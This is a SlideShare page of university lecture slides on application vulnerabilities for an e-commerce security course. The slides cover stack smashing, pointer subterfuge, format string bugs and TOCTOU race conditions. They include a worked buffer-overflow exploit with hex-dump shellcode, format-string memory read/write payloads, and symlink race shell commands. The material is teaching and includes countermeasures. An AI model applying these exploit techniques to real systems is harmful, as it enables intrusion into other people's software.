Ce diaporama a bien été signalé.
Nous utilisons votre profil LinkedIn et vos données d’activité pour vous proposer des publicités personnalisées et pertinentes. Vous pouvez changer vos préférences de publicités à tout moment.
Application
Vulnerabilities and
Attacks
COEN 351
Vulnerability and Exploits
 Software Defects:
 A software defect is the encoding of a human error into the
software, inc...
Vulnerabilities and Exploits
 Exploit:
Proof-of-concept exploits are developed to
prove the existence of a vulnerability...
Pointer Subterfuge
 Pointer Subterfuge modify a pointer’s
value.
Function pointers are overwritten to transfer
control t...
COEN 351 E-Commerce Security
 E-Commerce Security Course Homepage
 Lecture Notes
Pointer Subterfuge
 Using a buffer overflow:
 Buffer must be allocated in the
same segment as the target
pointer.
 Buff...
Buffer Overflow
 A buffer overflow occurs when data is written
outside of the boundaries of the memory
allocated to a par...
Buffer Overflow
 Process Memory Organization
Code or Text: Instructions
and read only data
Data: Initialized data,
uninit...
Stack Smashing
 When calling a subroutine / function:
 Stack stores the return address
 Stack stores arguments, return ...
Stack Smashing
#include <iostream>
bool IsPasswordOkay(void)
{
char Password[8];
gets(Password);
if (!strcmp(Password, “ba...
Stack Smashing
Storage for PwStatus (4 bytes)
Caller EBP – Frame Ptr OS (4
bytes)
Return Addr of main – OS (4
Bytes)
…
Pro...
Stack Smashing
Storage for Password (8 Bytes)
Caller EBP – Frame Ptr main (4
bytes)
Return Addr Caller – main (4
Bytes)
St...
Stack Smashing
Program stack after call to IsPasswordOkay()
puts("Enter Password:");
PwStatus=ISPasswordOkay();
if (PwStat...
Stack Smashing
 What happens if we enter more than 7
characters of an input string?
#include <iostream>
bool IsPasswordOk...
Stack Smashing
bool IsPasswordOkay(void)
{
char Password[8];
gets(Password);
if (!strcmp(Password,"badprog"))
return(true)...
Stack Smashing
 A specially crafted string
“abcdefghijklW►*!” produced the
following result:
Stack Smashing
The string “abcdefghijklW►*!”
overwrote 9 extra bytes of memory
on the stack changing the callers
return a...
Stack Smashing
 A buffer overflow can be exploited by
Changing the return address in order to
change the program flow (a...
Stack Smashing
 The get password program can be exploited to
execute arbitrary code by providing the following
binary dat...
Stack Smashing
000 31 32 33 34 35 36 37 38 39 30 31 32 33 34 35 36 "1234567890123456"
010 37 38 39 30 31 32 33 34 35 36 37...
Stack Smashing
000 31 32 33 34 35 36 37 38 39 30 31 32 33 34 35 36 "1234567890123456"
010 37 38 39 30 31 32 33 34 35 36 37...
Stack Smashing
000 31 32 33 34 35 36 37 38 39 30 31 32 33 34 35 36 "1234567890123456"
010 37 38 39 30 31 32 33 34 35 36 37...
Stack Smashing
000 31 32 33 34 35 36 37 38 39 30 31 32 33 34 35 36 "1234567890123456"
010 37 38 39 30 31 32 33 34 35 36 37...
Stack Smashing
Stack Smashing
000 31 32 33 34 35 36 37 38 39 30 31 32 33 34 35 36 "1234567890123456"
010 37 38 39 30 31 32 33 34 35 36 37...
Stack Smashing
000 31 32 33 34 35 36 37 38 39 30 31 32 33 34 35 36 "1234567890123456"
010 37 38 39 30 31 32 33 34 35 36 37...
Stack Smashing
000 31 32 33 34 35 36 37 38 39 30 31 32 33 34 35 36 "1234567890123456"
010 37 38 39 30 31 32 33 34 35 36 37...
Stack Smashing
000 31 32 33 34 35 36 37 38 39 30 31 32 33 34 35 36 "1234567890123456"
010 37 38 39 30 31 32 33 34 35 36 37...
Stack Smashing
000 31 32 33 34 35 36 37 38 39 30 31 32 33 34 35 36 "1234567890123456"
010 37 38 39 30 31 32 33 34 35 36 37...
Stack Smashing
000 31 32 33 34 35 36 37 38 39 30 31 32 33 34 35 36 "1234567890123456"
010 37 38 39 30 31 32 33 34 35 36 37...
Stack Smashing
 ./BufferOverflow < exploit.bin now
executes /usr/bin/cal0.
Stack Smashing Countermeasures
 Canaries
 Protect return addresses
 Random value is stored before return address.
 Whe...
Data Pointers Example
void foo(void * arg, size_t len) {
char buff[100];
long val = …;
long *ptr = …;
memcpy(buff, arg, le...
Data Pointers
 Arbitrary memory writes can change the
control flow.
 This is easier if the length of a pointer is
equal ...
Pointer Subterfuge
 Targets for memory overwrites:
Unix:
 GOT table
 .dtors
Windows
 Virtual function tables
 Excep...
Format String Vulnerabilities
 printf and companions are variadic
functions.
Variable number of arguments.
Format strin...
Format String Vulnerabilities
 Example
1. int func(char *user) {
2. printf(user);
3. }
 If the user argument can be cont...
Format String Vulnerability
 printf("%s%s%s%s%s%s%s%s%s%s%s%s");
 The %s conversion specifier displays memory at an
addr...
Viewing Stack Content
 Attackers can also exploit formatted output functions to
examine the contents of memory.
 Disasse...
Viewing the Contents of the Stack
0x00000000
e0f84201 2e25303801000000 02000000 03000000 25303878
% 0 8 x . % 0 8 x . % 0 ...
Viewing the Contents of the Stack
0x00000000
e0f84201 2e25303801000000 02000000 03000000 25303878
% 0 8 x . % 0 8 x . % 0 ...
Viewing the Contents of the Stack
0x00000000
e0f84201 2e25303801000000 02000000 03000000 25303878
% 0 8 x . % 0 8 x . % 0 ...
Viewing the Contents of the Stack
0x00000000
e0f84201 2e25303801000000 02000000 03000000 25303878
% 0 8 x . % 0 8 x . % 0 ...
Viewing the Contents of the Stack
0x00000000
e0f84201 2e25303801000000 02000000 03000000 25303878
% 0 8 x . % 0 8 x . % 0 ...
Viewing the Contents of the Stack
0x00000000
e0f84201 2e25303801000000 02000000 03000000 25303878
% 0 8 x . % 0 8 x . % 0 ...
Viewing the Contents of the Stack
0x00000000
e0f84201 2e25303801000000 02000000 03000000 25303878
% 0 8 x . % 0 8 x . % 0 ...
Viewing Memory at a Specific Location
0x00000000
dcf54201 25782578
Final argument pointer
e0f84201 01000000 02000000 03000...
Viewing Memory at a Specific Location
0x00000000
dcf54201 25782578
Final argument pointer
e0f84201 01000000 02000000 03000...
Viewing Memory Content
 printf() displays memory from 0x0142f5dc until a 0 byte
is reached.
 The entire address space ca...
Format String Vulnerability
 Arbitrary memory can be written by using the %n
specifier in the format string.
int i;
print...
Format String Vulnerability
printf("xdcxf5x42x01%08x.%08x.%08x%n”);
 Writes an integer value corresponding to the number ...
Format String Vulnerability
printf ("%16u%n%16u%n%32u%n%64u
%n",
 The first %16u%n sequence writes the value 16 to
the sp...
Dynamic Memory Errors
 Errors change internal heap structures,
leading to overwriting an arbitrary memory
address with an...
TOCTOU Race Conditions
 Race window by checking for some race
object and later accessing it.
TOCTOU
#include <stdio.h>
#include <unistd.h>
int main(int argc, char *argv[]) {
FILE *fd;
if (access("/some_file", W_OK) ...
TOCTOU
#include <stdio.h>
#include <unistd.h>
int main(int argc, char *argv[]) {
FILE *fd;
if (access("/some_file", W_OK) ...
TOCTOU
#include <stdio.h>
#include <unistd.h>
int main(int argc, char *argv[]) {
FILE *fd;
if (access("/some_file", W_OK) ...
TOCTOU
 Vulnerability
 An external process can change or replace the
ownership of some_file.
 If this program is runnin...
TOCTOU
 The program could be exploited by a user
executing the following shell commands during
the race window:
rm /some_...
TOCTOU Exploits Symbolic Link
if (stat("/some_dir/some_file", &statbuf) == -1) {
err(1, "stat");
}
if (statbuf.st_size >= ...
TOCTOU Exploits Symbolic Link
if (stat("/some_dir/some_file", &statbuf) == -1) {
err(1, "stat");
}
if (statbuf.st_size >= ...
TOCTOU Exploits Symbolic Link
 Attacker executes the following during the race
window :
 rm /some_dir/some_file
 ln -s ...
TOCTOU Exploits Symbolic Link
 Symbolic links are used because
 Owner of link does not need any permissions for the
targ...
TOCTOU Exploits Symbolic Link
 Example: passwd() functions of SunOS and
HP/UX
 passwd() requires user to specify passwor...
TOCTOU Exploits Symbolic Link
1. Attacker creates bogus password file called .rhosts
2. Attacker places .rhosts into attac...
TOCTOU Exploits Symbolic Link
 Symlink attack can cause exploited
software to open, remove, read, or write
a hijacked fil...
Morale
 Existing code base is full of software errors.
 Changing to safer languages is going to alleviate the
problem.
...
COEN 351 E-Commerce Security
 E-Commerce Security Course Homepage
 Lecture Notes
Prochain SlideShare
Chargement dans…5
×

E-Commerce Security - Application attacks - Server Attacks

741 vues

Publié le

Application Vulnerabilities and Attacks
Vulnerability and Exploits
E-Commerce Security , Application attacks , Server Attacks

Publié dans : Formation
  • Soyez le premier à commenter

E-Commerce Security - Application attacks - Server Attacks

  1. 1. Application Vulnerabilities and Attacks COEN 351
  2. 2. Vulnerability and Exploits  Software Defects:  A software defect is the encoding of a human error into the software, including omissions.  Security Flaw:  A security flaw is a software defect that poses a potential security risk.  Eliminating software defects eliminate security flaws.  A vulnerability is a set of conditions that allows an attacker to violate an explicit or implicit security policy.  Not all security flaws lead to vulnerabilities.  A security flaw can cause a program to be vulnerable to attack.  Vulnerabilities can also exist without a security flaw.
  3. 3. Vulnerabilities and Exploits  Exploit: Proof-of-concept exploits are developed to prove the existence of a vulnerability. Proof-of-concept exploits are beneficial when properly managed. Proof-of-concept exploit in the wrong hands can be quickly transformed into a worm or virus or used in an attack.
  4. 4. Pointer Subterfuge  Pointer Subterfuge modify a pointer’s value. Function pointers are overwritten to transfer control to an attacker supplied shellcode. Data pointers can also be changed to modify the program flow according to the attacker’s wishes.
  5. 5. COEN 351 E-Commerce Security  E-Commerce Security Course Homepage  Lecture Notes
  6. 6. Pointer Subterfuge  Using a buffer overflow:  Buffer must be allocated in the same segment as the target pointer.  Buffer must have a lower memory address than the target pointer.  Buffer must be susceptible to a buffer overflow exploit.
  7. 7. Buffer Overflow  A buffer overflow occurs when data is written outside of the boundaries of the memory allocated to a particular data structure. Source Memory Allocated Memory (8 Bytes) 11 Bytes of Data Copy Operation Other Memory
  8. 8. Buffer Overflow  Process Memory Organization Code or Text: Instructions and read only data Data: Initialized data, uninitialized data, static variables, global variables Heap: Dynamically allocated variables Stack: Local variables, return addresses, etc.
  9. 9. Stack Smashing  When calling a subroutine / function:  Stack stores the return address  Stack stores arguments, return values  Stack stores variables local to the subroutine  Information pushed on the stack for a subroutine call is called a frame.  Address of frame is stored in the frame or base point register.  epb on Intel architectures
  10. 10. Stack Smashing #include <iostream> bool IsPasswordOkay(void) { char Password[8]; gets(Password); if (!strcmp(Password, “badprog")) return(true); else return(false); } void main() { bool PwStatus; puts("Enter password:"); PwStatus = IsPasswordOkay(); if (PwStatus == false){ puts("Access denied"); exit(-1); } else puts("Access granted"); }
  11. 11. Stack Smashing Storage for PwStatus (4 bytes) Caller EBP – Frame Ptr OS (4 bytes) Return Addr of main – OS (4 Bytes) … Program stack before call to IsPasswordOkay() puts("Enter Password:"); PwStatus=ISPasswordOkay(); if (PwStatus==true) puts("Hello, Master"); else puts("Access denied"); Stack
  12. 12. Stack Smashing Storage for Password (8 Bytes) Caller EBP – Frame Ptr main (4 bytes) Return Addr Caller – main (4 Bytes) Storage for PwStatus (4 bytes) Caller EBP – Frame Ptr OS (4 bytes) Return Addr of main – OS (4 Bytes) … Program stack during call to IsPasswordOkay() puts("Enter Password:"); PwStatus=ISPasswordOkay(); if (PwStatus ==true) puts("Hello, Master"); else puts("Access denied"); bool IsPasswordOkay(void) { char Password[8]; gets(Password); if (!strcmp(Password,"badprog")) return(true); else return(false) } Stack
  13. 13. Stack Smashing Program stack after call to IsPasswordOkay() puts("Enter Password:"); PwStatus=ISPasswordOkay(); if (PwStatus ==true) puts("Hello, Master"); else puts("Access denied"); Storage for Password (8 Bytes) Caller EBP – Frame Ptr main (4 bytes) Return Addr Caller – main (4 Bytes) Storage for PwStatus (4 bytes) Caller EBP – Frame Ptr OS (4 bytes) Return Addr of main – OS (4 Bytes) … Stack
  14. 14. Stack Smashing  What happens if we enter more than 7 characters of an input string? #include <iostream> bool IsPasswordOkay(void) { char Password[8]; gets(Password); if (!strcmp(Password, “badprog")) return(true); else return(false); } void main() { bool PwStatus; puts("Enter password:"); PwStatus = IsPasswordOkay(); if (PwStatus == false){ puts("Access denied"); exit(-1); } else puts("Access granted"); }
  15. 15. Stack Smashing bool IsPasswordOkay(void) { char Password[8]; gets(Password); if (!strcmp(Password,"badprog")) return(true); else return(false) } Storage for Password (8 Bytes) “12345678” Caller EBP – Frame Ptr main (4 bytes) “9012” Return Addr Caller – main (4 Bytes) “3456” Storage for PwStatus (4 bytes) “7890” Caller EBP – Frame Ptr OS (4 bytes) “0” Return Addr of main – OS (4 Bytes) … Stack The return address and other data on the stack is over written because the memory space allocated for the password can only hold a maximum 7 character plus the NULL terminator.
  16. 16. Stack Smashing  A specially crafted string “abcdefghijklW►*!” produced the following result:
  17. 17. Stack Smashing The string “abcdefghijklW►*!” overwrote 9 extra bytes of memory on the stack changing the callers return address thus skipping the execution of line 3 Storage for Password (8 Bytes) “abcdefgh” Caller EBP – Frame Ptr main (4 bytes) “ijkl” Return Addr Caller – main (4 Bytes) “W►*!” (return to line 4 was line 3) Storage for PwStatus (4 bytes) “/0” Caller EBP – Frame Ptr OS (4 bytes) Return Addr of main – OS (4 Bytes) Stack Line Statement 1 puts("Enter Password:"); 2 PwStatus=ISPasswordOkay (); 3 if (PwStatus ==true) 4 puts("Hello, Master"); 5 else puts("Access denied");
  18. 18. Stack Smashing  A buffer overflow can be exploited by Changing the return address in order to change the program flow (arc-injection) Change the return address to point into the buffer where it contains some malicious code (Code injection)
  19. 19. Stack Smashing  The get password program can be exploited to execute arbitrary code by providing the following binary data file as input: 000 31 32 33 34 35 36 37 38-39 30 31 32 33 34 35 36 "1234567890123456" 010 37 38 39 30 31 32 33 34-35 36 37 38 E0 F9 FF BF "789012345678a· +" 020 31 C0 A3 FF F9 FF BF B0-0B BB 03 FA FF BF B9 FB "1+ú · +¦+· +¦v" 030 F9 FF BF 8B 15 FF F9 FF-BF CD 80 FF F9 FF BF 31 "· +ï§ · +-Ç · +1" 040 31 31 31 2F 75 73 72 2F-62 69 6E 2F 63 61 6C 0A "111/usr/bin/cal “  This exploit is specific to Red Hat Linux 9.0 and GCC
  20. 20. Stack Smashing 000 31 32 33 34 35 36 37 38 39 30 31 32 33 34 35 36 "1234567890123456" 010 37 38 39 30 31 32 33 34 35 36 37 38 E0 F9 FF BF "789012345678a· +" 020 31 C0 A3 FF F9 FF BF B0 0B BB 03 FA FF BF B9 FB "1+ú · +¦+· +¦v" 030 F9 FF BF 8B 15 FF F9 FF BF CD 80 FF F9 FF BF 31 "· +ï§ · +-Ç · +1" 040 31 31 31 2F 75 73 72 2F 62 69 6E 2F 63 61 6C 0A "111/usr/bin/cal “  The first 16 bytes of binary data fill the allocated storage space for the password.  NOTE: Even though the program only allocated 12 bytes for the password, the version of the gcc compiler used allocates stack data in multiples of 16 bytes
  21. 21. Stack Smashing 000 31 32 33 34 35 36 37 38 39 30 31 32 33 34 35 36 "1234567890123456" 010 37 38 39 30 31 32 33 34 35 36 37 38 E0 F9 FF BF "789012345678a· +" 020 31 C0 A3 FF F9 FF BF B0 0B BB 03 FA FF BF B9 FB "1+ú · +¦+· +¦v" 030 F9 FF BF 8B 15 FF F9 FF BF CD 80 FF F9 FF BF 31 "· +ï§ · +-Ç · +1" 040 31 31 31 2F 75 73 72 2F 62 69 6E 2F 63 61 6C 0A "111/usr/bin/cal “  The next 12 bytes of binary data fill the extra storage space that was created by the compiler to keep the stack aligned on a16-byte boundary.
  22. 22. Stack Smashing 000 31 32 33 34 35 36 37 38 39 30 31 32 33 34 35 36 "1234567890123456" 010 37 38 39 30 31 32 33 34 35 36 37 38 E0 F9 FF BF "789012345678a· +" 020 31 C0 A3 FF F9 FF BF B0 0B BB 03 FA FF BF B9 FB "1+ú · +¦+· +¦v" 030 F9 FF BF 8B 15 FF F9 FF BF CD 80 FF F9 FF BF 31 "· +ï§ · +-Ç · +1" 040 31 31 31 2F 75 73 72 2F 62 69 6E 2F 63 61 6C 0A "111/usr/bin/cal “  The next 12 bytes of binary data fill the extra storage space that was created by the compiler to keep the stack aligned on a16-byte boundary.
  23. 23. Stack Smashing 000 31 32 33 34 35 36 37 38 39 30 31 32 33 34 35 36 "1234567890123456" 010 37 38 39 30 31 32 33 34 35 36 37 38 E0 F9 FF BF "789012345678a· +" 020 31 C0 A3 FF F9 FF BF B0 0B BB 03 FA FF BF B9 FB "1+ú · +¦+· +¦v" 030 F9 FF BF 8B 15 FF F9 FF BF CD 80 FF F9 FF BF 31 "· +ï§ · +-Ç · +1" 040 31 31 31 2F 75 73 72 2F 62 69 6E 2F 63 61 6C 0A "111/usr/bin/cal “  The next 4 bytes overwrite the return address.  The new return address is 0X BF FF F9 E0 (little- endian)
  24. 24. Stack Smashing
  25. 25. Stack Smashing 000 31 32 33 34 35 36 37 38 39 30 31 32 33 34 35 36 "1234567890123456" 010 37 38 39 30 31 32 33 34 35 36 37 38 E0 F9 FF BF "789012345678a· +" 020 31 C0 A3 FF F9 FF BF B0 0B BB 03 FA FF BF B9 FB "1+ú · +¦+· +¦v" 030 F9 FF BF 8B 15 FF F9 FF BF CD 80 FF F9 FF BF 31 "· +ï§ · +-Ç · +1" 040 31 31 31 2F 75 73 72 2F 62 69 6E 2F 63 61 6C 0A "111/usr/bin/cal “  The malicious code.  Purpose of malicious code is to call execve with a user provided set of parameters.  In this program, instead of spawning a shell, we just call the linux calculator program.
  26. 26. Stack Smashing 000 31 32 33 34 35 36 37 38 39 30 31 32 33 34 35 36 "1234567890123456" 010 37 38 39 30 31 32 33 34 35 36 37 38 E0 F9 FF BF "789012345678a· +" 020 31 C0 A3 FF F9 FF BF B0 0B BB 03 FA FF BF B9 FB "1+ú · +¦+· +¦v" 030 F9 FF BF 8B 15 FF F9 FF BF CD 80 FF F9 FF BF 31 "· +ï§ · +-Ç · +1" 040 31 31 31 2F 75 73 72 2F 62 69 6E 2F 63 61 6C 0A "111/usr/bin/cal “  The malicious code:  xor %eax,%eax #set eax to zero  mov %eax,0xbffff9ff #set to NULL word Create a zero value and use it to NULL terminate the argument list. This is necessary to terminate the argument list.
  27. 27. Stack Smashing 000 31 32 33 34 35 36 37 38 39 30 31 32 33 34 35 36 "1234567890123456" 010 37 38 39 30 31 32 33 34 35 36 37 38 E0 F9 FF BF "789012345678a· +" 020 31 C0 A3 FF F9 FF BF B0 0B BB 03 FA FF BF B9 FB "1+ú · +¦+· +¦v" 030 F9 FF BF 8B 15 FF F9 FF BF CD 80 FF F9 FF BF 31 "· +ï§ · +-Ç · +1" 040 31 31 31 2F 75 73 72 2F 62 69 6E 2F 63 61 6C 0A "111/usr/bin/cal “  The malicious code:  xor %eax,%eax #set eax to zero  mov %eax,0xbffff9ff #set to NULL word  mov $0xb,%al #set code for execve Set the value of register al to 0xb. This value indicates a system call to execve.
  28. 28. Stack Smashing 000 31 32 33 34 35 36 37 38 39 30 31 32 33 34 35 36 "1234567890123456" 010 37 38 39 30 31 32 33 34 35 36 37 38 E0 F9 FF BF "789012345678a· +" 020 31 C0 A3 FF F9 FF BF B0 0B BB 03 FA FF BF B9 FB "1+ú · +¦+· +¦v" 030 F9 FF BF 8B 15 FF F9 FF BF CD 80 FF F9 FF BF 31 "· +ï§ · +-Ç · +1" 040 31 31 31 2F 75 73 72 2F 62 69 6E 2F 63 61 6C 0A "111/usr/bin/cal “  The malicious code:  mov $0xb,%al #set code for execve  mov $0xbffffa03,%ebx #ptr to arg 1  mov $0xbffff9fb,%ecx #ptr to arg 2  mov 0xbffff9ff,%edx #ptr to arg 3  This puts the pointers to the arguments into ebc, ecx, and edx registers.
  29. 29. Stack Smashing 000 31 32 33 34 35 36 37 38 39 30 31 32 33 34 35 36 "1234567890123456" 010 37 38 39 30 31 32 33 34 35 36 37 38 E0 F9 FF BF "789012345678a· +" 020 31 C0 A3 FF F9 FF BF B0 0B BB 03 FA FF BF B9 FB "1+ú · +¦+· +¦v" 030 F9 FF BF 8B 15 FF F9 FF BF CD 80 FF F9 FF BF 31 "· +ï§ · +-Ç · +1" 040 31 31 31 2F 75 73 72 2F 62 69 6E 2F 63 61 6C 0A "111/usr/bin/cal “  The malicious code:  mov $0xbffffa03,%ebx #ptr to arg 1  mov $0xbffff9fb,%ecx #ptr to arg 2  mov 0xbffff9ff,%edx #ptr to arg 3  int $80 # make system call to execve  Now make the system call to execve. The arguments are in the registers.
  30. 30. Stack Smashing 000 31 32 33 34 35 36 37 38 39 30 31 32 33 34 35 36 "1234567890123456" 010 37 38 39 30 31 32 33 34 35 36 37 38 E0 F9 FF BF "789012345678a· +" 020 31 C0 A3 FF F9 FF BF B0 0B BB 03 FA FF BF B9 FB "1+ú · +¦+· +¦v" 030 F9 FF BF 8B 15 FF F9 FF BF CD 80 FF F9 FF BF 31 "· +ï§ · +-Ç · +1" 040 31 31 31 2F 75 73 72 2F 62 69 6E 2F 63 61 6C 0A "111/usr/bin/cal “ The malicious code:  Last part are the arguments.
  31. 31. Stack Smashing  ./BufferOverflow < exploit.bin now executes /usr/bin/cal0.
  32. 32. Stack Smashing Countermeasures  Canaries  Protect return addresses  Random value is stored before return address.  When returning, check whether canary has been altered.  Non-executable stacks  Prevents shellcode injection  Randomizing stack layout  Introduce bogus empty blocks of memory on stack  Attacker cannot predict stack layout
  33. 33. Data Pointers Example void foo(void * arg, size_t len) { char buff[100]; long val = …; long *ptr = …; memcpy(buff, arg, len); *ptr = val; … return; } Buffer is vulnerable to overflow. Both val and ptr are located after the buffer and can be overwritten. This allows a buffer overflow to write an arbitrary address in memory.
  34. 34. Data Pointers  Arbitrary memory writes can change the control flow.  This is easier if the length of a pointer is equal to the length of important data structures. Intel 32 Architectures:  sizeof(void*) = sizeof(int) = sizeof(long) = 4B.
  35. 35. Pointer Subterfuge  Targets for memory overwrites: Unix:  GOT table  .dtors Windows  Virtual function tables  Exception handlers  Details in Secure Programming Course
  36. 36. Format String Vulnerabilities  printf and companions are variadic functions. Variable number of arguments. Format string and addresses of arguments in the format string are placed on the stack.  Format string vulnerability: User controls (partially) input to printf
  37. 37. Format String Vulnerabilities  Example 1. int func(char *user) { 2. printf(user); 3. }  If the user argument can be controlled by a user, this program can be exploited to crash the program, view the contents of the stack, view memory content, or overwrite memory
  38. 38. Format String Vulnerability  printf("%s%s%s%s%s%s%s%s%s%s%s%s");  The %s conversion specifier displays memory at an address specified in the corresponding argument on the execution stack.  Because no string arguments are supplied in this example, printf() reads arbitrary memory locations from the stack until the format string is exhausted or an invalid pointer or unmapped address is encountered.
  39. 39. Viewing Stack Content  Attackers can also exploit formatted output functions to examine the contents of memory.  Disassembled printf() call 0x00000000 char format [32]; strcpy(format, "%08x.%08x.%08x.%08x"); printf(format, 1, 2, 3); 1. push 3 2. push 2 3. push 1 4. push offset format 5. call _printf 6. add esp,10h Arguments are pushed onto the stack in reverse order. the arguments in memory appear in the same order as in the printf() call
  40. 40. Viewing the Contents of the Stack 0x00000000 e0f84201 2e25303801000000 02000000 03000000 25303878 % 0 8 x . % 0 8 x . % 0 8 x . % 0 8 x 00000001.00000002.00000003.25303878 Format string: Output: Memory: Initial argument pointer Final argument pointer The address of the format string 0xe0f84201 appears in memory followed by the argument values 1, 2, and 3
  41. 41. Viewing the Contents of the Stack 0x00000000 e0f84201 2e25303801000000 02000000 03000000 25303878 % 0 8 x . % 0 8 x . % 0 8 x . % 0 8 x 00000001.00000002.00000003.25303878 Format string: Output: Memory: Initial argument pointer Final argument pointer The memory immediately following the arguments contains the automatic variables for the calling function, including the contents of the format character array 0x2e253038
  42. 42. Viewing the Contents of the Stack 0x00000000 e0f84201 2e25303801000000 02000000 03000000 25303878 % 0 8 x . % 0 8 x . % 0 8 x . % 0 8 x 00000001.00000002.00000003.25303878 Format string: Output: Memory: Initial argument pointer Final argument pointer The format string %08x. %08x.%08x.%08 instructs printf() to retrieve four arguments from the stack and display them as eight- digit padded hexadecimal numbers
  43. 43. Viewing the Contents of the Stack 0x00000000 e0f84201 2e25303801000000 02000000 03000000 25303878 % 0 8 x . % 0 8 x . % 0 8 x . % 0 8 x 00000001.00000002.00000003.25303878 Format string: Output: Memory: Initial argument pointer Final argument pointer As each argument is used by the format specification, the argument pointer is increased by the length of the argument.
  44. 44. Viewing the Contents of the Stack 0x00000000 e0f84201 2e25303801000000 02000000 03000000 25303878 % 0 8 x . % 0 8 x . % 0 8 x . % 0 8 x 00000001.00000002.00000003.25303878 Format string: Output: Memory: Initial argument pointer Final argument pointer Each %08x in the format string reads a value it interprets as an int from the location identified by the argument pointer.
  45. 45. Viewing the Contents of the Stack 0x00000000 e0f84201 2e25303801000000 02000000 03000000 25303878 % 0 8 x . % 0 8 x . % 0 8 x . % 0 8 x 00000001.00000002.00000003.25303878 Format string: Output: Memory: Initial argument pointer Final argument pointer The values output by each format string are shown below the format string.
  46. 46. Viewing the Contents of the Stack 0x00000000 e0f84201 2e25303801000000 02000000 03000000 25303878 % 0 8 x . % 0 8 x . % 0 8 x . % 0 8 x 00000001.00000002.00000003.25303878 Format string: Output: Memory: Initial argument pointer Final argument pointer The fourth “integer” contains the first four bytes of the format string—the ASCII codes for %08x.
  47. 47. Viewing Memory at a Specific Location 0x00000000 dcf54201 25782578 Final argument pointer e0f84201 01000000 02000000 03000000 xdc - written to stdout xf5 - written to stdout x42 - written to stdout x01 - written to stdout %x - advances argument pointer %x - advances argument pointer %x - advances argument pointer %s - outputs string at address specified Initial argument pointer Memory: in next argument % x % x address advance-argptr %s xdcxf5x42x01%x%x%x%s The series of three %x conversion specifiers advance the argument pointer twelve bytes to the start of the format string
  48. 48. Viewing Memory at a Specific Location 0x00000000 dcf54201 25782578 Final argument pointer e0f84201 01000000 02000000 03000000 xdc -written to stdout xf5 -written to stdout x42 -written to stdout x01 -written to stdout %x - advances argument pointer %x - advances argument pointer %x - advances argument pointer %s - outputs string at address specified Initial argument pointer Memory: in next argument % x % x address advance-argptr %s xdcxf5x42x01%x%x%x%s The %s conversion specifier displays memory at the address supplied at the beginning of the format string.
  49. 49. Viewing Memory Content  printf() displays memory from 0x0142f5dc until a 0 byte is reached.  The entire address space can be mapped by advancing the address between calls to printf().  Viewing memory at an arbitrary address can help an attacker develop other exploits, such as executing arbitrary code on a compromised machine.
  50. 50. Format String Vulnerability  Arbitrary memory can be written by using the %n specifier in the format string. int i; printf("hello%nn", (int *)&i);  The variable i is assigned the value 5 because five characters (h-e-l-l-o) are written until the %n conversion specifier is encountered.  Using the %n conversion specifier, an attacker can write a small integer value to an address.
  51. 51. Format String Vulnerability printf("xdcxf5x42x01%08x.%08x.%08x%n”);  Writes an integer value corresponding to the number of characters output to the address 0x0142f5dc.  The value written (28) is equal to the eight-character- wide hex fields (times three) plus the four address bytes.  An attacker can overwrite the address with the address of some shellcode.
  52. 52. Format String Vulnerability printf ("%16u%n%16u%n%32u%n%64u %n",  The first %16u%n sequence writes the value 16 to the specified address, but the second %16u%n sequence writes 32 bytes because the counter has not been reset.
  53. 53. Dynamic Memory Errors  Errors change internal heap structures, leading to overwriting an arbitrary memory address with an arbitrary value Double free.  Exploited vulnerability in both Linux and Windows
  54. 54. TOCTOU Race Conditions  Race window by checking for some race object and later accessing it.
  55. 55. TOCTOU #include <stdio.h> #include <unistd.h> int main(int argc, char *argv[]) { FILE *fd; if (access("/some_file", W_OK) == 0) { printf("access granted.n"); fd = fopen("/some_file", "wb+"); /* write to the file */ fclose(fd); } . . . return 0; } The access() function is called to check if the file exists and has write permission.
  56. 56. TOCTOU #include <stdio.h> #include <unistd.h> int main(int argc, char *argv[]) { FILE *fd; if (access("/some_file", W_OK) == 0) { printf("access granted.n"); fd = fopen("/some_file", "wb+"); /* write to the file */ fclose(fd); } . . . return 0; } the file is opened for writing
  57. 57. TOCTOU #include <stdio.h> #include <unistd.h> int main(int argc, char *argv[]) { FILE *fd; if (access("/some_file", W_OK) == 0) { printf("access granted.n"); fd = fopen("/some_file", "wb+"); /* write to the file */ fclose(fd); } . . . return 0; } Race window between checking for access and opening file.
  58. 58. TOCTOU  Vulnerability  An external process can change or replace the ownership of some_file.  If this program is running with an effective user ID (UID) of root, the replacement file is opened and written to.  If an attacker can replace some_file with a link during the race window, this code can be exploited to write to any file of the attacker’s choosing.
  59. 59. TOCTOU  The program could be exploited by a user executing the following shell commands during the race window: rm /some_file ln /myfile /some_file  The TOCTOU condition can be mitigated by replacing the call to access() with logic that drops privileges to the real UID, opens the file with fopen(), and checks to ensure that the file was opened successfully.
  60. 60. TOCTOU Exploits Symbolic Link if (stat("/some_dir/some_file", &statbuf) == -1) { err(1, "stat"); } if (statbuf.st_size >= MAX_FILE_SIZE) { err(2, "file size"); } if ((fd=open("/some_dir/some_file", O_RDONLY)) == -1) { err(3, "open - /some_dir/some_file"); } 11. // process file stats /some_dir/some_file and opens the file for reading if it is not too large.
  61. 61. TOCTOU Exploits Symbolic Link if (stat("/some_dir/some_file", &statbuf) == -1) { err(1, "stat"); } if (statbuf.st_size >= MAX_FILE_SIZE) { err(2, "file size"); } if ((fd=open("/some_dir/some_file", O_RDONLY)) == -1) { err(3, "open - /some_dir/some_file"); } 11. // process file The TOCTOU check occurs with the call of stat() TOCTOU use is the call to fopen()
  62. 62. TOCTOU Exploits Symbolic Link  Attacker executes the following during the race window :  rm /some_dir/some_file  ln -s attacker_file /some_dir/some_file  The file passed as an argument to stat() is not the same file that is opened.  The attacker has hijacked /some_dir/some_file by linking this name to attacker_file.
  63. 63. TOCTOU Exploits Symbolic Link  Symbolic links are used because  Owner of link does not need any permissions for the target file.  The attacker only needs write permissions for the directory in which the link is created.  Symbolic links can reference a directory. The attacker might replace /some_dir with a symbolic link to a completely different directory
  64. 64. TOCTOU Exploits Symbolic Link  Example: passwd() functions of SunOS and HP/UX  passwd() requires user to specify password file as parameter 1. Open password file, authenticate user, close file. 2. Create and open temporary file ptmp in same directory. 3. Reopen password file and copy updated version into ptmp. 4. Close both files and rename ptmp as the new password file.
